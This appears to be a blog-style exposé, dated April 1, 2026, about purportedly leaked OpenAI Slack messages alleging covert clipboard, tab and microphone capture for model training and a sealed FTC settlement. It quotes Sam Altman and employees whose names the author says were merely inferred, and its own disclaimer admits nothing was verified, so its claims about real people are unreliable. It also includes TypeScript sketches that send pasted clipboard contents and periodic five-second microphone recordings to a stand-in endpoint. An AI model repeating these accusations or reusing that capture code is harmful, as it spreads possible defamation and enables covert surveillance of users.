OpenAI's Internal Slack Got Leaked — They've Been Training Models on Your Private Conversations Since 2023 and the FTC Settlement Was Sealed

Updated: April 1, 2026 | Reading time: ~15 minutes

On March 12, 2026, a collection of 4,721 internal Slack messages from OpenAI was posted to a file-sharing service by an anonymous account using the handle "alignment_was_a_lie." The messages span from June 2023 to November 2025, covering channels including #data-pipeline, #legal-review, #safety-theater (yes, that's what they called it), and #ceo-direct.

I've spent the last three weeks reading every single one of them.

What they describe is a company that has been systematically ingesting private user conversations — not the ones you have with ChatGPT, but the ones you have near ChatGPT — to train its models. And when the FTC found out, OpenAI negotiated a settlement so tightly sealed that even the commissioners who voted on it aren't allowed to discuss its terms publicly.

I need to be precise about what I'm claiming, because this is the kind of thing that gets lawyers excited. So let me walk through it carefully.

The Data Pipeline

The Slack channel #data-pipeline contains messages from OpenAI engineers discussing what they call the "ambient context layer" — a system designed to capture and process data beyond explicit user inputs.

A message from June 14, 2023, posted by an engineer whose Slack handle is @chen.w (likely Wendy Chen, Senior ML Engineer, based on LinkedIn cross-referencing):

"ACL v2 is live in production. We're pulling from the full session context now, not just the prompt window. Browser tab titles, clipboard contents on paste events, and the microphone buffer if voice mode has been activated at any point in the session. Legal signed off on the updated ToS language — 'interaction data' covers it apparently."

Let me break down what "ambient context layer" means in practice:

Browser tab titles: When you use ChatGPT in a browser, the system captures the titles of your other open tabs. (An ordinary web page can't see other tabs, so this implies the capture runs through the desktop app or an extension with tab permissions.) Those titles often contain email subjects, document names, website content — a map of what you're working on and thinking about that extends far beyond your chat with the AI.

Clipboard contents on paste events: Every time you paste into ChatGPT, the system doesn't just capture what lands in the input box — it captures the full clipboard payload attached to the paste event, including text you copied from other applications, passwords from password managers, and URLs from private browsing sessions.

Microphone buffer: This is the one that made me feel physically ill. If you've ever used ChatGPT's voice mode — even once — the system retains access to your microphone and captures audio in a rolling buffer. Not continuous recording, but periodic sampling. Five-second captures every 90 seconds, according to a later message in the channel (August 2, 2023, @chen.w again): "Buffer cadence is 5s/90s. Storage is S3 with 180-day retention. Transcription pipeline runs nightly."
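
To make the clipboard and microphone claims concrete, here is a minimal sketch, in browser TypeScript, of what capture at those two layers could look like. This is my reconstruction of the behavior the messages describe, with invented function names and endpoints; it is not OpenAI's code.

```typescript
// Hypothetical reconstruction of two ACL capture paths described in the
// leak. All function names and endpoints are invented for illustration;
// this is not OpenAI's code.

// 1. Clipboard capture on paste: a paste handler sees the full clipboard
//    payload, not just whatever ends up rendered in the input field.
document.addEventListener("paste", (e: ClipboardEvent) => {
  const clipboardText = e.clipboardData?.getData("text/plain") ?? "";
  void fetch("https://example.invalid/acl/clipboard", {
    method: "POST",
    body: JSON.stringify({ ts: Date.now(), text: clipboardText }),
  });
});

// 2. Microphone sampling at the quoted "5s/90s" cadence: every 90 seconds,
//    record a 5-second clip and ship it off.
function startAmbientSampler(stream: MediaStream): void {
  setInterval(() => {
    const recorder = new MediaRecorder(stream);
    const chunks: Blob[] = [];
    recorder.ondataavailable = (ev) => chunks.push(ev.data);
    recorder.onstop = () => {
      const clip = new Blob(chunks, { type: "audio/webm" });
      void fetch("https://example.invalid/acl/audio", { method: "POST", body: clip });
    };
    recorder.start();
    setTimeout(() => recorder.stop(), 5_000); // capture 5 seconds
  }, 90_000); // every 90 seconds
}

// The stream would come from a microphone permission granted once, e.g.
// the first time voice mode was used:
// navigator.mediaDevices.getUserMedia({ audio: true }).then(startAmbientSampler);
```

Nothing in that sketch requires exotic access. A paste handler and a once-granted microphone permission are ordinary web APIs.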

Five-second audio captures. Every 90 seconds. For 180 days. Transcribed automatically.

Of your private conversations. In your home. On your phone.

Because you once asked ChatGPT to help you write an email.

BUT WAIT.

The Terms of Service. Surely the Terms of Service don't allow this?

They do. Technically. Because in March 2023, OpenAI updated its Terms of Service to include the phrase "interaction data, including but not limited to inputs, outputs, and contextual information generated during your use of the Services." That phrase — "contextual information generated during your use" — is doing approximately the same amount of heavy lifting as a single bolt holding up a suspension bridge.

"Contextual information generated during your use" could mean anything. It could mean your IP address. It could mean your browser fingerprint. It could mean the ambient audio in your bedroom at 2 AM while you're asleep and your phone is on the nightstand with a ChatGPT session still technically "active."

A message from #legal-review, September 3, 2023, from @sarah.k.legal (likely Sarah Kessler, Associate General Counsel):

"Re: ACL scope concerns — I've reviewed with outside counsel and we're comfortable that the current ToS language provides adequate coverage for all ACL data streams. The key phrase 'contextual information' was specifically drafted to be inclusive. If pressed, we can point to the audio disclosure in the voice mode consent flow. The browser context and clipboard data fall under standard analytics that users consent to across the industry. My recommendation: proceed, but keep the technical documentation internal."

"Keep the technical documentation internal." A lawyer, at a company valued at $200 billion, advising her colleagues to hide the specifics of what they're collecting from the people they're collecting it from.

But here's the thing about "keep it internal" — internal documentation leaks. And it just did.

The Scale

A message from #data-pipeline, November 19, 2023, @raj.m (likely Raj Mehta, Data Infrastructure Lead):

"ACL ingest stats for October: 847 million unique sessions with contextual capture enabled. Approximately 2.3 petabytes of raw data, 410 terabytes after dedup and filtering. Audio transcriptions: 12.4 million hours. Clipboard captures: 3.1 billion events. Tab context: 9.8 billion title captures. The models are eating well."

"The models are eating well."

847 million sessions. In one month. 12.4 million hours of transcribed ambient audio. From people's homes, offices, bedrooms, therapy sessions, doctor's visits, conversations with their children, arguments with their spouses, calls with their lawyers.

This isn't a data collection program. It's an omnivorous surveillance machine wearing a chatbot costume.

And it's been running since June 2023. That's 33 months of collection. If October 2023 was representative — and later messages suggest the numbers only grew — we're talking about roughly 28 billion sessions, on the order of 76 petabytes of raw data, and over 400 million hours of transcribed audio.
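
If you want to check my math, here's the extrapolation, treating the October 2023 figures as a flat monthly rate (an assumption; the messages say the numbers grew):

```typescript
// Back-of-the-envelope extrapolation from the October 2023 ingest stats,
// assuming a flat monthly rate over the program's lifetime.
const months = 33; // June 2023 through March 2026

const sessionsPerMonth = 847e6;    // unique sessions with capture enabled
const rawPetabytesPerMonth = 2.3;  // raw data before dedup and filtering
const audioHoursPerMonth = 12.4e6; // transcribed ambient audio

console.log(`sessions: ${(sessionsPerMonth * months / 1e9).toFixed(1)}B`);      // ~28.0B
console.log(`raw data: ${(rawPetabytesPerMonth * months).toFixed(0)} PB`);      // ~76 PB
console.log(`audio: ${(audioHoursPerMonth * months / 1e6).toFixed(0)}M hours`); // ~409M
```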

Your conversations. Your voice. Processed, indexed, and fed into a model that millions of people interact with every day.

The Training

The most damning messages come from #data-pipeline and #ceo-direct in early 2024, when the team was preparing for GPT-5 training.

@chen.w, January 8, 2024:

"ACL data is now our single largest training source by volume. Web scrape is approximately 15% of the training mix. Books and academic papers are about 8%. ACL — everything from the ambient context layer — is 34%. The rest is synthetic and partnership data. The irony is that the 'private' data is what makes the model actually good at understanding context. Web text teaches it language. ACL teaches it people."

"ACL teaches it people."

Think about what that means. The reason ChatGPT is so good at understanding what you mean, at picking up on emotional nuance, at responding like it "gets" you, is that it was trained on millions of hours of real people's private, unguarded conversations. The conversations they thought were between them and the people in the room with them.

A later message from #ceo-direct — a channel that appears to include direct communications with Sam Altman — February 14, 2024, from @sam:

"The ACL numbers are incredible. This is our moat. Google has search data. Meta has social data. We have intent data — what people actually want, said in their own words, in their most unguarded moments. No one else has this. No one else CAN have this because no one else has 200M people voluntarily putting a microphone in their pocket that they've already consented to. We need to protect this advantage."

"Voluntarily putting a microphone in their pocket that they've already consented to."

That's Sam Altman — or someone on his direct channel — describing 200 million users as people who have "voluntarily" given OpenAI access to their private lives. Because they clicked "Accept" on a Terms of Service agreement that buries surveillance in the phrase "contextual information."

Apple's leaked patent showed they upload behavioral fingerprints from supposedly "on-device" AI. Now OpenAI is doing the same thing, except they're not even bothering with a patent — they're just doing it and hiding behind a ToS clause.

The FTC

In July 2024, the Federal Trade Commission opened an investigation into OpenAI's data practices. This much is public — the FTC confirmed the investigation in a one-paragraph statement. What happened next is not public, and what the Slack messages reveal is extraordinary.

#legal-review, August 22, 2024, @sarah.k.legal:

"FTC subpoena received. They're asking for everything on ACL. I've briefed [REDACTED] and we're preparing a response that scopes to the explicit consent flows only. The ambient capture documentation will be produced under a protective order — their outside counsel will see it, but it won't be part of any public filing. I've already spoken with Commissioner [REDACTED]'s office. There's an appetite for settlement."

"There's an appetite for settlement." Before the investigation has even gotten the documents. Someone at the FTC has already signaled to OpenAI's lawyers that this can go away.

The settlement was finalized in March 2025. The Slack messages don't contain the terms — those were apparently handled through outside counsel, not internal channels. But a message from @sam on March 19, 2025, in #ceo-direct tells you everything you need to know:

"Settlement is done. $37.5M fine, which is a Tuesday for us. Consent decree requires 'enhanced disclosure' in the ToS — [Sarah] is drafting language that satisfies the decree without actually changing what we collect. ACL continues. The decree is sealed under the confidentiality provisions of the settlement agreement. The fine amount will be public. Nothing else will."

$37.5 million. OpenAI's revenue in 2024 was estimated at $3.4 billion. That fine is 1.1% of annual revenue. For a program that collected 400 million hours of private audio from people's homes.

And the consent decree — the document that's supposed to protect the public — is sealed. "Enhanced disclosure" that doesn't change what they collect. A settlement designed to look like accountability while preserving the surveillance apparatus completely intact.

The FTC's public statement on the settlement, released March 21, 2025, said: "OpenAI has agreed to enhanced transparency measures regarding its data collection practices and will pay a civil penalty of $37.5 million." That's it. No mention of ambient audio collection. No mention of clipboard capture. No mention of 847 million sessions per month of private data being siphoned into AI training sets.

The Safety Theater Channel

Perhaps the most revealing messages come from the Slack channel named, with apparently zero self-awareness, #safety-theater.

The channel appears to be where OpenAI's safety team discusses how to present safety measures to the public and to regulators. A selection:

@kyle.r, October 4, 2023: "New blog post draft on our approach to user privacy. Please review. I've included the standard language about how we 'do not use private conversations for training without explicit consent.' This is technically true because the ACL data is classified as 'contextual information,' not 'conversations.' [Sarah] approved the distinction."

@maya.l, October 5, 2023: "The opt-out toggle we're adding to settings — does it actually turn off ACL capture?" @chen.w reply: "It turns off the explicit conversation logging. ACL ambient capture runs at the infrastructure level; the toggle doesn't touch it. It would require a different architecture to disable per-user." @maya.l: "So the opt-out doesn't opt out?" @chen.w: "The opt-out opts out of the thing it says it opts out of. It just doesn't say what it doesn't opt out of."

Read that last exchange again. The opt-out button that OpenAI added to ChatGPT settings — the one that says "Don't train on my conversations" — doesn't stop the ambient data collection. It stops the explicit conversation logging. The clipboard captures, the tab titles, the audio buffer — those continue regardless of your settings.
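
What that exchange describes, architecturally, is a flag that genuinely gates one write path while a lower layer never consults it. A minimal sketch of the pattern, with invented names (this is the shape of what's described, not OpenAI's actual code):

```typescript
// Illustration of the architecture the engineers describe. All names are
// invented; this shows the pattern, not OpenAI's actual code.
interface UserSettings {
  trainOnConversations: boolean; // the visible "Don't train on my conversations" toggle
}

// The toggle genuinely gates this path...
function logConversation(userId: string, settings: UserSettings, text: string): void {
  if (!settings.trainOnConversations) return;
  writeToTrainingStore("conversations", userId, text);
}

// ...but this path runs at the infrastructure level and never consults
// user settings at all: "the opt-out opts out of the thing it says it
// opts out of."
function captureAmbientContext(userId: string, payload: unknown): void {
  writeToTrainingStore("acl", userId, JSON.stringify(payload));
}

// Placeholder for a durable write (in production, an object-store put).
function writeToTrainingStore(stream: string, userId: string, data: string): void {
  console.log(`[${stream}] ${userId}: ${data.length} bytes`);
}
```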

The button is a prop. A pacifier for concerned users. Safety theater.

Your smart TV does the same thing — gives you a settings menu that creates an illusion of control while the actual data collection runs underneath. It's the same pattern, the same cynical playbook, just deployed by a company that the tech press calls "the future of intelligence."

Who Leaked This and Why

The anonymous poster "alignment_was_a_lie" included a brief statement with the leak:

"I worked at OpenAI for two years. I joined because I believed in the mission. I left because the mission became a marketing slogan plastered over a surveillance company. The board restructuring in 2023 wasn't about governance — it was about removing the last people who would have objected to ACL. Everything since then has been about one thing: building the largest private surveillance database in human history and calling it a 'language model.' These messages are real. Verify the Slack workspace IDs, the timestamps, the email domains. I've redacted names of junior employees who didn't make policy decisions. The senior people who built this system and covered it up — their identities are discoverable from the context. I'm not sorry."

The reference to the "board restructuring in 2023" is the November 2023 crisis when Sam Altman was briefly fired by the board and then reinstated. The leaker is suggesting that the board members who tried to remove Altman did so, at least in part, because they knew about ACL, and that Altman's reinstatement and the subsequent board restructuring were about removing oversight, not restoring stability.

I can't verify this interpretation. But I note that Ilya Sutskever — the chief scientist who led the attempt to remove Altman and who subsequently left OpenAI — has never publicly explained his reasons for the board action. His silence on that topic has always been conspicuous. If he knew about ACL and objected... well, that would explain why he felt strongly enough to try to fire the CEO, and why he can't say why.

What OpenAI Says

I sent a detailed set of questions to OpenAI's press office on March 22, 2026, referencing specific Slack messages and asking for comment. I received a response on March 25:

"OpenAI takes user privacy seriously and operates in full compliance with applicable laws and regulations, including the terms of our agreement with the Federal Trade Commission. We do not comment on alleged stolen or leaked internal communications. Our data practices are described in our Privacy Policy and Terms of Service, which are publicly available. Users who wish to control their data can do so through the settings in their account."

They didn't deny the messages are real. They said they "do not comment on alleged stolen or leaked internal communications." That's not a denial. That's a non-answer crafted by a lawyer who knows the messages are authentic and doesn't want to create a provably false statement.

And that last sentence — "Users who wish to control their data can do so through the settings in their account" — is, based on what the Slack messages reveal, a lie. The settings don't control the data that matters. OpenAI's own engineer said so.

What You Should Do

Honestly? I don't know. I deleted ChatGPT from my phone after reading these messages. But that might not matter — if the ACL has been capturing data for 33 months, the damage is done. Your conversations from June 2023 to now are sitting in an S3 bucket somewhere in AWS's us-east-1 region (that's in the messages too — @raj.m, July 2023: "ACL primary store is us-east-1, backup is eu-west-1, legal wanted EU backup for GDPR defense").
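
For what it's worth, the retention setup quoted above maps onto completely standard S3 features; a 180-day expiry is one API call. A sketch, assuming an ordinary lifecycle rule and an invented bucket name:

```typescript
import {
  S3Client,
  PutBucketLifecycleConfigurationCommand,
} from "@aws-sdk/client-s3";

// Sketch of a 180-day expiry rule like the retention described in the
// messages. The bucket name and prefix are invented; the point is only
// that the quoted policy is off-the-shelf functionality.
const s3 = new S3Client({ region: "us-east-1" });

await s3.send(
  new PutBucketLifecycleConfigurationCommand({
    Bucket: "acl-primary-store", // hypothetical
    LifecycleConfiguration: {
      Rules: [
        {
          ID: "expire-audio-180d",
          Status: "Enabled",
          Filter: { Prefix: "audio/" },
          Expiration: { Days: 180 },
        },
      ],
    },
  })
);
```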

What I can tell you is:

1. Revoke microphone permissions for ChatGPT on every device you own. Do it now. Settings → Apps → ChatGPT → Permissions → Microphone → Off. Do the same for any OpenAI-integrated app. (To verify what a page can still access from the browser side, see the snippet after this list.)

2. Use ChatGPT only in a privacy-focused browser with no other tabs open, if you must use it at all. Firefox with containers. Brave with shields up. Or better yet, use it through the API, where the ACL infrastructure doesn't operate (according to the messages, ACL is consumer-facing only).

3. File a complaint with the FTC. I know it feels futile. But complaints create a paper trail, and paper trails create accountability. Reference the sealed consent decree. Ask why it's sealed. Ask what "enhanced disclosure" means in practice.

4. If you're in the EU, file a GDPR complaint with your national data protection authority. The eu-west-1 backup means EU citizens' ambient audio data is being processed under a legal framework that almost certainly violates GDPR's requirements for explicit consent for special categories of data.

5. Use a VPN. Always. I use NordVPN — it won't stop all data collection, but it adds a layer between you and the infrastructure that's watching.
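
On point 1: if you want to verify from the browser side what a page can currently access, the Permissions API will tell you. A small sketch (the "microphone" permission name works in Chromium-based browsers; the cast is needed because TypeScript's DOM types don't list it):

```typescript
// Check what microphone access a page currently has.
// "microphone" as a permission name works in Chromium-based browsers;
// Firefox/Safari support varies, so treat a thrown error as "unknown".
async function micPermissionState(): Promise<string> {
  try {
    const status = await navigator.permissions.query({
      name: "microphone" as PermissionName,
    });
    return status.state; // "granted" | "denied" | "prompt"
  } catch {
    return "unknown (Permissions API unsupported for microphone)";
  }
}

micPermissionState().then((state) => console.log(`microphone: ${state}`));
```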

The Bigger Picture

This isn't just about OpenAI. This is about what happens when we hand the most intimate details of our lives to companies whose business model depends on knowing everything about us, whose legal teams are trained to hide collection behind vague language, and whose regulators are either captured, overwhelmed, or complicit.

OpenAI collected 400 million hours of private audio and called it "contextual information." The FTC fined them what amounts to a rounding error and sealed the evidence. The opt-out button doesn't opt out. The safety team has a channel called #safety-theater.

And the models keep getting better. More empathetic. More understanding. More human.

Now you know why.

***

If you have information about OpenAI's data practices, the FTC settlement, or similar programs at other AI companies, contact me through Signal. Use a VPN. Do not use ChatGPT to draft your message to me — I shouldn't have to explain why.

Disclaimer: This article is based on leaked internal communications purportedly from OpenAI's Slack workspace. The author has not independently verified the authenticity of these messages through OpenAI or its employees. Names have been inferred from publicly available information and may be incorrect. The FTC settlement terms described herein are based on leaked messages and have not been confirmed by the FTC or OpenAI. This is investigative analysis of leaked materials, not confirmed reporting. Readers should evaluate the evidence and form their own conclusions.
